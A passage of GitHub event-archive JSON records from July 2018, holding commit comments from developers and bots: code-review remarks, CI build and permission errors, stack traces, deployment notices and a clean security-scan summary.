`call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-19T21:01:15Z"}
{"id":"7991609219","type":"CommitCommentEvent","actor":{"login":"Rohanator9000"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29770573,"position":110,"line":110,"path":"jwt/JWT.php","commit_id":"32081ae460eb7ee880c599fde51e194de1f8a718","created_at":"2018-07-19T21:02:11Z","updated_at":"2018-07-19T21:02:11Z","author_association":"NONE","body":"@edwindo Don't worry about files in the jwt directory. Those were just copied from another repository, we didn't change anything."}},"created_at":"2018-07-19T21:02:11Z"}
{"id":"7991609557","type":"CommitCommentEvent","actor":{"login":"poznas"},"repo":{"name":"poznas/BSM-App-2.0"},"payload":{"comment":{"id":29770575,"position":5,"line":560,"path":"app/src/main/java/com/bsm/mobile/legacy/module/judge/rate/JudgeRateSMPostActivity.java","commit_id":"5b83860674fbba5a7e4c45705250e591ca461e71","created_at":"2018-07-19T21:02:15Z","updated_at":"2018-07-19T21:02:15Z","author_association":"OWNER","body":"oh ty danonie z 2017 \r\n"}},"created_at":"2018-07-19T21:02:15Z"}
{"id":"7991613620","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/saymore"},"payload":{"comment":{"id":29770589,"position":null,"line":null,"path":null,"commit_id":"8e17d547ebcd19da5a06b69920f95c3ea0128fce","created_at":"2018-07-19T21:03:07Z","updated_at":"2018-07-19T21:03:07Z","author_association":"NONE","body":"TeamCity SayMore :: SayMore pull requests [Build *.*.203.8e17d547ebcd19da5a06b69920f95c3ea0128fce](http://build.palaso.org/viewLog.html?buildId=125218&buildTypeId=SayMore_SayMorePullRequests) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:17"}},"created_at":"2018-07-19T21:03:07Z"}
{"id":"7991618839","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29770604,"position":null,"line":null,"path":null,"commit_id":"2543f3b42c0e40358a6c063a0d54c16eade214f9","created_at":"2018-07-19T21:04:11Z","updated_at":"2018-07-19T21:04:11Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/docker-worker\",\n            \"queue:task-group-id:taskcluster-github/SKaEFCtBTeCCDyREsDqYsw\",\n            \"queue:schedule-task:taskcluster-github/SKaEFCtBTeCCDyREsDqYsw/SKaEFCtBTeCCDyREsDqYsw\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:repo:github.com/bocoup/wpt:branch:master\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:index.garbage.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/docker-worker\",\n                \"queue:task-group-id:taskcluster-github/SKaEFCtBTeCCDyREsDqYsw\",\n                \"queue:schedule-task:taskcluster-github/SKaEFCtBTeCCDyREsDqYsw/SKaEFCtBTeCCDyREsDqYsw\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-19T21:04:11.312Z\n\n</details>"}},"created_at":"2018-07-19T21:04:11Z"}
{"id":"7991622012","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29770616,"position":null,"line":null,"path":null,"commit_id":"c37cd258bd8ea6a5245fbd81757d1b0328914dcc","created_at":"2018-07-19T21:04:53Z","updated_at":"2018-07-19T21:04:53Z","author_association":"NONE","body":"👍 Thank you for the contribution. ❤️"}},"created_at":"2018-07-19T21:04:53Z"}
{"id":"7991628525","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29770633,"position":15,"line":83,"path":"code/drasil-code/Language/Drasil/CodeSpec.hs","commit_id":"62c37254b4ee21059c51187460bbc0f6b83a455e","created_at":"2018-07-19T21:06:15Z","updated_at":"2018-07-19T21:06:15Z","author_association":"COLLABORATOR","body":"Done in PR #922."}},"created_at":"2018-07-19T21:06:15Z"}
{"id":"7991628691","type":"CommitCommentEvent","actor":{"login":"jerrydonaldwatson"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29770635,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T21:06:18Z","updated_at":"2018-07-19T21:06:18Z","author_association":"NONE","body":"Congrats!!"}},"created_at":"2018-07-19T21:06:18Z"}
{"id":"7991632070","type":"CommitCommentEvent","actor":{"login":"mitar"},"repo":{"name":"usc-isi-i2/dsbox-featurizer"},"payload":{"comment":{"id":29770645,"position":null,"line":null,"path":null,"commit_id":"59dacbd057bf16372fdf521117aa6d3e2af6cff9","created_at":"2018-07-19T21:07:03Z","updated_at":"2018-07-19T21:07:03Z","author_association":"NONE","body":"This broke your primitive. There is no `1.3.0` version of `dsbox-datacleaning` on PyPi.\r\n\r\nIf you want to use `dependency_links`, you have to provide the version in `egg` so that `pip` can know how to match `1.3.0` to `dependency_links`. Something like `egg=dsbox-datacleaning-1.3.0`. Now I am not sure how this will work out because `dsbox-datacleaning` contains `-`.\r\n\r\nAnyway, this is breaking the image building, so I have to disable your primitive annotations. Please resubmit. I am not sure why validation didn't catch it."}},"created_at":"2018-07-19T21:07:03Z"}
{"id":"7991637287","type":"CommitCommentEvent","actor":{"login":"duri0214"},"repo":{"name":"duri0214/VBA"},"payload":{"comment":{"id":29770657,"position":null,"line":null,"path":null,"commit_id":"e148e10fa3126df27782c17a7eff4530d2d61520","created_at":"2018-07-19T21:08:11Z","updated_at":"2018-07-19T21:08:11Z","author_association":"OWNER","body":"隠しファイルではないとき、というbit演算が入ります"}},"created_at":"2018-07-19T21:08:11Z"}
{"id":"7991643390","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29770666,"position":null,"line":null,"path":null,"commit_id":"9ff368ebf48fc466951ff40314351a40d0181d1a","created_at":"2018-07-19T21:09:37Z","updated_at":"2018-07-19T21:09:37Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#ci-20](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#ci-20).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-20-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-19T21:09:37Z"}
{"id":"7991644147","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29770669,"position":11,"line":164,"path":"src/etc/inc/system.inc","commit_id":"188b098110acd4eaee360edb3bba53b2fb39845a","created_at":"2018-07-19T21:09:46Z","updated_at":"2018-07-19T21:09:46Z","author_association":"MEMBER","body":"since this is for local resolving through libc it's ok to use either one. it can resolve both A and AAAA. adding ::1 additionally also doesn't make much sense, it'll only lengthen lookup times through the chain. we're good here as is. :)"}},"created_at":"2018-07-19T21:09:46Z"}
{"id":"7991644229","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29770670,"position":null,"line":null,"path":null,"commit_id":"7913c519dff639e6e878580a4f512c26cd355171","created_at":"2018-07-19T21:09:48Z","updated_at":"2018-07-19T21:09:48Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/job.rb:39:in `dig'\n/app/objects/job.rb:39:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-19T21:09:48Z"}
{"id":"7991646896","type":"CommitCommentEvent","actor":{"login":"griff3n"},"repo":{"name":"griff3n/Cagd"},"payload":{"comment":{"id":29770676,"position":3,"line":20,"path":"QTCagd/QTCagd/src/halfEdge.h","commit_id":"2ce9d503ec18f9f2e4f9f71a9740778b92b8ee02","created_at":"2018-07-19T21:10:22Z","updated_at":"2018-07-19T21:10:22Z","author_association":"OWNER","body":"\"isSelected\" aus GraphicObject in \"selected\" umbenennen und \"selected\" aus halfEdge und graphicVertex löschen."}},"created_at":"2018-07-19T21:10:22Z"}
{"id":"7991647857","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29770680,"position":null,"line":null,"path":null,"commit_id":"cb2ded0074cb9cf3d4463daf4c5a5b827cb469db","created_at":"2018-07-19T21:10:36Z","updated_at":"2018-07-19T21:10:36Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#pr-20](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#pr-20).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-20-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-19T21:10:36Z"}
{"id":"7991649709","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29770684,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-19T21:10:59Z","updated_at":"2018-07-19T21:10:59Z","author_association":"OWNER","body":"Checkmarx scan results 20 Jul 2018 00:10 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016TEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1000010&projectid=11\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-19T21:10:59Z"}
{"id":"7991650282","type":"CommitCommentEvent","actor":{"login":"ManuelDCR"},"repo":{"name":"stephanheinemann/worldwind"},"payload":{"comment":{"id":29770685,"position":null,"line":null,"path":null,"commit_id":"6e3b2af5b055055d7ceaaace3baa7d040d6f4c20","created_at":"2018-07-19T21:11:07Z","updated_at":"2018-07-19T21:11:07Z","author_association":"COLLABORATOR","body":"Committed to wrong issue. Refers to issue #13."}},"created_at":"2018-07-19T21:11:07Z"}
{"id":"7991651651","type":"CommitCommentEvent","actor":{"login":"ManuelDCR"},"repo":{"name":"stephanheinemann/worldwind"},"payload":{"comment":{"id":29770687,"position":null,"line":null,"path":null,"commit_id":"d090797eb45ec4f257dcdbbcf5857adaa73901cd","created_at":"2018-07-19T21:11:25Z","updated_at":"2018-07-19T21:11:25Z","author_association":"COLLABORATOR","body":"Committed to wrong issue. Refers to issue #13."}},"created_at":"2018-07-19T21:11:25Z"}
{"id":"7991656170","type":"CommitCommentEvent","actor":{"login":"DennisLoska"},"repo":{"name":"g6123/certbot"},"payload":{"comment":{"id":29770698,"position":null,"line":null,"path":null,"commit_id":"e74505968ba24a364a5be70ef86bbe20620d17db","created_at":"2018-07-19T21:12:23Z","updated_at":"2018-07-19T21:12:23Z","author_association":"NONE","body":"Too bad it is not working for me I still get the error :("}},"created_at":"2018-07-19T21:12:23Z"}
{"id":"7991658277","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29770707,"position":30,"line":47,"path":"Lesson_3/station_control.rb","commit_id":"1113d7759de7f771a640810e806542b94d45d14d","created_at":"2018-07-19T21:12:52Z","updated_at":"2018-07-19T21:12:52Z","author_association":"NONE","body":"Этот метод лишний. У нас уже есть ридер stations. Не помню, если в скринкасте есть это, но ридер :stations - разворачивается внутри в такую штуку\r\n```\r\ndef stations\r\n  @stations\r\nend\r\n```\r\nЧто в принципе дублирует функционал этого метода. В данном случае - этот метод избыточен"}},"created_at":"2018-07-19T21:12:52Z"}
{"id":"7991660286","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"Microsoft/Detours"},"payload":{"comment":{"id":29770710,"position":null,"line":null,"path":null,"commit_id":"bdd8cec1c06b2058073e3a92bbe7257b9ed84d7e","created_at":"2018-07-19T21:13:20Z","updated_at":"2018-07-19T21:13:20Z","author_association":"NONE","body":"This should be pbNext = pbModule + inh.OptionalHeader.SizeOfImage. And I doubt the overflow check is needed -- maybe only for invalid images, that probably can't get this far anyway."}},"created_at":"2018-07-19T21:13:20Z"}
{"id":"7991663423","type":"CommitCommentEvent","actor":{"login":"mpu-creare"},"repo":{"name":"creare-com/podpac"},"payload":{"comment":{"id":29770716,"position":null,"line":null,"path":null,"commit_id":"cc81961bb6ab4c51bc8a4a8b35b27f93b2e5b19a","created_at":"2018-07-19T21:14:03Z","updated_at":"2018-07-19T21:14:03Z","author_association":"CONTRIBUTOR","body":"@mlshapiro This should probably go into a unittest. I stumbled across the problem while I was making this notebook: https://github.com/creare-com/podpac/blob/develop/doc/notebooks/composite-array-datasources.ipynb "}},"created_at":"2018-07-19T21:14:03Z"}
{"id":"7991664145","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29770718,"position":59,"line":59,"path":"StudentIQTest-shell/pom.xml","commit_id":"3190fddc38e9a457f3a2c6254fbe222114b7eca7","created_at":"2018-07-19T21:14:13Z","updated_at":"2018-07-19T21:14:13Z","author_association":"NONE","body":"А вот у этой зависимости можно не стаивить version и type. Они уже заданы в `spring-boot-starter-parent`.\r\n\r\nА type jar стоит у всех по умолчанию, поэтому его можно вообще не стаивть."}},"created_at":"2018-07-19T21:14:13Z"}
{"id":"7991664796","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29770720,"position":103,"line":73,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"3a135f21c95bf2e361a9fb25f117dbe81d724875","created_at":"2018-07-19T21:14:21Z","updated_at":"2018-07-19T21:14:21Z","author_association":"COLLABORATOR","body":"hello, when you mean a string, do you mean I return the entire string for the schema.fasta file, or just one-line strings? What would be the purpose for returning the string?"}},"created_at":"2018-07-19T21:14:21Z"}
{"id":"7991665513","type":"CommitCommentEvent","actor":{"login":"Scode97"},"repo":{"name":"Scode97/challenge1"},"payload":{"comment":{"id":29770722,"position":null,"line":null,"path":null,"commit_id":"c3a73296daa48628d3651cd96e8505c5d94a92d0","created_at":"2018-07-19T21:14:31Z","updated_at":"2018-07-19T21:14:31Z","author_association":"OWNER","body":"just checking if commited"}},"created_at":"2018-07-19T21:14:31Z"}
{"id":"7991666468","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29770726,"position":37,"line":52,"path":"Lesson_3/station_control.rb","commit_id":"1113d7759de7f771a640810e806542b94d45d14d","created_at":"2018-07-19T21:14:43Z","updated_at":"2018-07-19T21:14:43Z","author_association":"NONE","body":"нам все еще не нужно открывать эти переменные внешнему коду. Мы хотим меня значения этих переменных только в резултате вызова методов внутри класса Train. В ридеры"}},"created_at":"2018-07-19T21:14:43Z"}
{"id":"7991667306","type":"CommitCommentEvent","actor":{"login":"ikkez"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":29770731,"position":null,"line":null,"path":null,"commit_id":"836495179ae6a72a2488af30ac9573080ee542dc","created_at":"2018-07-19T21:14:55Z","updated_at":"2018-07-19T21:14:55Z","author_association":"COLLABORATOR","body":"`$key` is not defined in jig and mongo changes\r\nit's probably breaking BC in userland code\r\nitsn't its purpose the same as just using **->cast()** ?\r\n"}},"created_at":"2018-07-19T21:14:55Z"}
{"id":"7991667470","type":"CommitCommentEvent","actor":{"login":"x-ji"},"repo":{"name":"ismla-japanese-helper/japanese-helper"},"payload":{"comment":{"id":29770733,"position":null,"line":null,"path":null,"commit_id":"14483fe087d9a1041525e45d413a6a6f312fd59a","created_at":"2018-07-19T21:14:57Z","updated_at":"2018-07-19T21:14:57Z","author_association":"CONTRIBUTOR","body":"Accidentally added a test file. Can just be ignored."}},"created_at":"2018-07-19T21:14:57Z"}
{"id":"7991675796","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29770761,"position":null,"line":null,"path":null,"commit_id":"5877525b1dd4ddcf5038cdc9bdead9279bbe0907","created_at":"2018-07-19T21:16:50Z","updated_at":"2018-07-19T21:16:50Z","author_association":"COLLABORATOR","body":"As far as I can see the other TAMs already have no problem with the formal, but I should check again with every inflection to make sure."}},"created_at":"2018-07-19T21:16:50Z"}
{"id":"7991675985","type":"CommitCommentEvent","actor":{"login":"chcg"},"repo":{"name":"notepad-plus-plus/notepad-plus-plus"},"payload":{"comment":{"id":29770762,"position":8,"line":26,"path":"PowerEditor/installer/packageAll.bat","commit_id":"7ce0ab04e6148c12f152be53293a7773c2b725b0","created_at":"2018-07-19T21:16:53Z","updated_at":"2018-07-19T21:16:53Z","author_association":"CONTRIBUTOR","body":"@donho Is this path correct?\r\nhttps://github.com/notepad-plus-plus/wingup/releases/download/v5.0.2 doesn't exist.\r\nShouldn't it be somwhere at:\r\nhttps://github.com/gup4win/wingup/releases?\r\n\r\nBut the latest release there is just 4.2. Also at http://wingup.org/download/."}},"created_at":"2018-07-19T21:16:53Z"}
{"id":"7991680925","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29770769,"position":34,"line":34,"path":"StudentIQTest-shell/src/test/java/ru/otus/elena/studentiqtest/iqtest/IQTestImplTest.java","commit_id":"3190fddc38e9a457f3a2c6254fbe222114b7eca7","created_at":"2018-07-19T21:18:02Z","updated_at":"2018-07-19T21:18:02Z","author_association":"NONE","body":"Ваще тестировать приватные методы - то ещё занятие и лучше так не делать. Проще сделать его package-private, т.е. без модификатора. И он станте нормально досутпен в тесте, но не доступен из других паккейджей"}},"created_at":"2018-07-19T21:18:02Z"}
{"id":"7991681202","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29770770,"position":null,"line":null,"path":null,"commit_id":"5877525b1dd4ddcf5038cdc9bdead9279bbe0907","created_at":"2018-07-19T21:18:06Z","updated_at":"2018-07-19T21:18:06Z","author_association":"COLLABORATOR","body":"ah if that's the case then we might not need it"}},"created_at":"2018-07-19T21:18:06Z"}
{"id":"7991683967","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29770778,"position":74,"line":74,"path":"StudentIQTest-shell/pom.xml","commit_id":"3190fddc38e9a457f3a2c6254fbe222114b7eca7","created_at":"2018-07-19T21:18:43Z","updated_at":"2018-07-19T21:18:43Z","author_association":"NONE","body":"Вот Вы используете junit, а добаивли testng - не нужно его добавлять."}},"created_at":"2018-07-19T21:18:43Z"}
{"id":"7991684283","type":"CommitCommentEvent","actor":{"login":"Hexcles"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29770779,"position":null,"line":null,"path":null,"commit_id":"553c1be50213729d5e573ab2db3e6c12e4c2272b","created_at":"2018-07-19T21:18:47Z","updated_at":"2018-07-19T21:18:47Z","author_association":"NONE","body":"This is awesome! Kudos to @jugglinmike !"}},"created_at":"2018-07-19T21:18:47Z"}
{"id":"7991684981","type":"CommitCommentEvent","actor":{"login":"ted-morrison"},"repo":{"name":"ted-morrison/TestingNewRepository"},"payload":{"comment":{"id":29770782,"position":2,"line":2,"path":"README.md","commit_id":"853cb13d9496917ecae9e2a0313f1feca9c30641","created_at":"2018-07-19T21:18:56Z","updated_at":"2018-07-19T21:18:56Z","author_association":"OWNER","body":"##Testing a new heading"}},"created_at":"2018-07-19T21:18:56Z"}
